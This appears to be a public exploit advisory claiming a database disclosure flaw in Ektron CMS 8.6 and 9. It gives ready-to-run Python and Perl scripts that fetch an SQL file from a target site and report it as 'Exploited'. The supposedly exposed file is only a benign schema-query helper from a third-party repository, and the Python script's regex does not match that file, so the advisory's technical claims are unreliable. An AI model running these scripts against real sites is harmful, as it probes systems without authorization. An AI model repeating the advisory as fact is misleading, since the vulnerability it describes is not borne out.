Ektron CMS 9 Database Disclosure

`###########################################################################  
  
# Exploit Title : Ektron CMS 9 Database Disclosure Exploit  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 02/04/2019  
# Vendor Homepage : ektron.com  
episerver.com/products/platform/ektron/  
# Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip  
# Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/  
github.com/whanrott/Ektron_sql_scripts  
cmsmatrix.org/matrix/cms-matrix/ektron-cms  
# Software Affected Versions : 8.6 and 9  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type :   
CWE-200 [ Information Exposure ]  
CWE-538 [ File and Directory Information Exposure ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
###########################################################################  
  
# Description about Software :  
***************************  
Ektron Web Content Management System (CMS) is the platform of choice for more   
  
than 3,700 global companies.   
  
Episerver Digital Experience Cloud™ The only platform that puts Digital Content, Commerce   
  
and Marketing in one screen.  
  
Create, deploy, and manage enterprise-scale, global, personalized websites. Empower users,   
  
designers, and developers to work in parallel, speeding time-to-web. Make content updates   
  
directly on the site using an intuitive browser-based editor. Create site wireframes, ensuring global   
  
brand consistency. Speed development using Ektron's Framework API, pre-built   
  
.NET controls, and standard development tools like Microsoft Visual Studio.  
  
###########################################################################  
  
# Impact :  
***********  
* The product stores sensitive information in files or directories that are accessible   
  
to actors outside of the intended control sphere.  
  
* An information exposure is the intentional or unintentional disclosure of information   
  
to an actor that is not explicitly authorized to have access to that information.  
  
* This information is highly sensitive and should not be found on a production system.  
  
Information :  
*************  
Ektron SQL Scripts :  
  
Simple SQL scripts for examining the database of Ektron CMS v9.  
  
Scripts  
Script Name Purpose  
find_all_users.sql   
List all users with last login date  
  
find_content_and_folder.sql  
List all content, showing folder. Filter by multiple criteria  
  
find_content_history.sql   
Show content item history  
  
find_database_column_names.sql   
query the database structure to find matching tables and column names  
  
find_folder_permissions.sql   
List folder permissions  
  
###########################################################################  
  
Files :  
*****  
/find_all_users.sql  
/find_content_alias_and_template.sql  
/find_content_and_folder.sql  
/find_content_history.sql  
/find_database_column_names.sql  
/find_folder_permissions.sql  
/find_menu_items.sql  
/find_meta_course_accreditation.sql  
/find_meta_course_combinations.sql  
/find_mismatched_content.sql  
/where_is_this_content_used.sql  
  
Information [ find_database_column_names.sql ]  
*********************************************  
/* look for table column names */  
  
--USE <database name>;  
  
SELECT  
TABLE_NAME  
,COLUMN_NAME  
,DATA_TYPE  
,CHARACTER_MAXIMUM_LENGTH  
FROM  
INFORMATION_SCHEMA.COLUMNS  
WHERE  
-- COLUMN_NAME LIKE '%%'  
--AND TABLE_NAME LIKE '%_tbl'  
--AND (TABLE_NAME LIKE '%%' OR COLUMN_NAME LIKE '%template%')  
--AND  
(  
COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%'  
)  
AND COLUMN_NAME LIKE '%%'  
AND TABLE_NAME NOT LIKE '%_tracking'  
ORDER BY  
TABLE_NAME, COLUMN_NAME  
;  
  
###########################################################################  
  
# Database Disclosure Information Exposure Exploit 1 :  
***********************************************  
#!/usr/bin/python  
import string  
import re  
from urllib2 import Request, urlopen  
disc = "/find_database_column_names.sql"  
url = raw_input ("URL: ")  
req = Request(url+disc)  
rta = urlopen(req)  
print "Result"  
html = rta.read()  
rdo = str(re.findall("resources.*=*", html))  
print rdo  
exit  
  
###########################################################################  
  
# Database Disclosure Information Exposure Exploit 2 :  
***********************************************  
#!/usr/bin/perl -w  
# Author : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
system('Ektron CMS V.9 Database Disclosure Exploit');  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="find_database_column_names.sql";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Wait Please Dear Hacker!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/find_database_column_names.sql");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/find_database_column_names.sql\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
###########################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
###########################################################################  
`